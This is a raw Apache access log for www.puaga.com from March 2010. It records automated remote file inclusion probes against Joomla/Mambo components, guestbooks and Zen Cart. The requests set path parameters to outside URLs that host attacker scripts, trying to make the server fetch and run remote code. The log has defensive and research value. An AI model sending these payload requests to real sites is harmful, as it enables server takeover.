121.101.214.54 - - [01/Mar/2010:09:54:28 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:09:54:28 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:09:54:28 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [01/Mar/2010:09:54:38 -0800] "GET /addevent.inc.php?agendax_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:09:54:38 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:09:54:38 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:09:54:38 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:09:54:42 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:09:54:42 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:09:54:42 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:09:54:46 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:09:54:49 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:09:54:53 -0800] "GET /logs///common/db.php?commonpath=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:09:55:03 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.154.76.52 - - [01/Mar/2010:09:55:10 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.154.76.52 - - [01/Mar/2010:09:55:10 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.154.76.52 - - [01/Mar/2010:09:55:10 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.154.76.52 - - [01/Mar/2010:09:55:20 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:55:27 -0800] "GET /logs/access_100222.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:09:55:30 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:09:55:30 -0800] "GET /logs/access_100203.log//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:09:55:30 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [01/Mar/2010:09:55:44 -0800] "GET /logs/access_100123.log/?sourcedir=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
62.67.235.148 - - [01/Mar/2010:09:55:45 -0800] "GET /?sourcedir=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
62.67.235.148 - - [01/Mar/2010:09:55:45 -0800] "GET /logs/?sourcedir=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:09:55:48 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [01/Mar/2010:09:56:16 -0800] "GET /errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [01/Mar/2010:09:56:16 -0800] "GET /logs/errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [01/Mar/2010:09:56:16 -0800] "GET /logs/access_100221.log/errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [01/Mar/2010:09:56:20 -0800] "GET /logs/access.log/errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.126.38 - - [01/Mar/2010:09:58:23 -0800] "GET /ideal/forum/viewtopic.php?p=15857 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
200.78.235.181 - - [01/Mar/2010:09:59:19 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:09:59:19 -0800] "GET /logs/access_100125.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:09:59:20 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:09:59:37 -0800] "GET /logs///common/db.php?commonpath=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
210.154.76.52 - - [01/Mar/2010:09:59:43 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.154.76.52 - - [01/Mar/2010:09:59:43 -0800] "GET /logs/access_100203.log//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.154.76.52 - - [01/Mar/2010:09:59:43 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.154.76.52 - - [01/Mar/2010:09:59:44 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:59:55 -0800] "GET /logs/access_100212.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:00:37 -0800] "GET /guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:00:37 -0800] "GET /logs/access_100126.log%20%20//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:00:37 -0800] "GET /logs//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:00:40 -0800] "GET /guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:00:40 -0800] "GET /logs//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:00:40 -0800] "GET /logs/access_100126.log%20%20//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:00:48 -0800] "GET /logs/access_100217.log%20%20//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:01:02 -0800] "GET /logs/access_100217.log%20%20//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:10:01:04 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:01:37 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 3642 "-" "libwww-perl/5.812" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:10:02:04 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:10:02:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:10:02:04 -0800] "GET /logs/access_100119.log%20%20/modules/My_eGallery/index.php?basepath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:03:21 -0800] "GET /logs////administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:03:21 -0800] "GET ///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:03:22 -0800] "GET /logs/access_100219.log////administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:03:22 -0800] "GET /logs////administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:03:22 -0800] "GET /logs/access_100219.log////administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:03:25 -0800] "GET ///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:05:12 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:05:12 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:05:12 -0800] "GET /logs/access_100125.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:05:33 -0800] "GET /logs/access_100126.log//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:05:37 -0800] "GET /logs/access_100217.log//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:05:56 -0800] "GET /logs/access_100220.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:06:08 -0800] "GET /logs/access_100126.log//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:06:10 -0800] "GET /logs/access_100217.log//guestbook1//admin.php?include_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:07 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:07 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:08 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:08 -0800] "GET /logs/access_100209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:35 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:35 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:35 -0800] "GET /logs/access_100209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:35 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:43 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:43 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:43 -0800] "GET /logs/access_100209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:07:43 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:08:40 -0800] "GET /logs/access_100213.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:08:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:08:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:09:44 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:09:44 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:09:44 -0800] "GET /logs/access_100203.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:10:09:47 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:10:09:47 -0800] "GET /logs/access_100206.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:10:09:48 -0800] "GET /logs/access_100206.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [01/Mar/2010:10:09:48 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:10:26 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:10:45 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:11:00 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:11:11 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:11:11 -0800] "GET /logs/access_100209.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:11:11 -0800] "GET /logs/access_100203.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:11:14 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:12:15 -0800] "GET /modules/xfsection/modify.php?dir_module=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:12:15 -0800] "GET /logs/access_100208.log%20%20//modules/xfsection/modify.php?dir_module=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:10:12:15 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:10:14:11 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:10:14:11 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:10:14:11 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:10:14:28 -0800] "GET /logs/access_100209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:15:38 -0800] "GET /logs/access_100203.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:22:30 -0800] "GET /logs/access_100208.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:24:08 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:25:25 -0800] "GET /logs/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
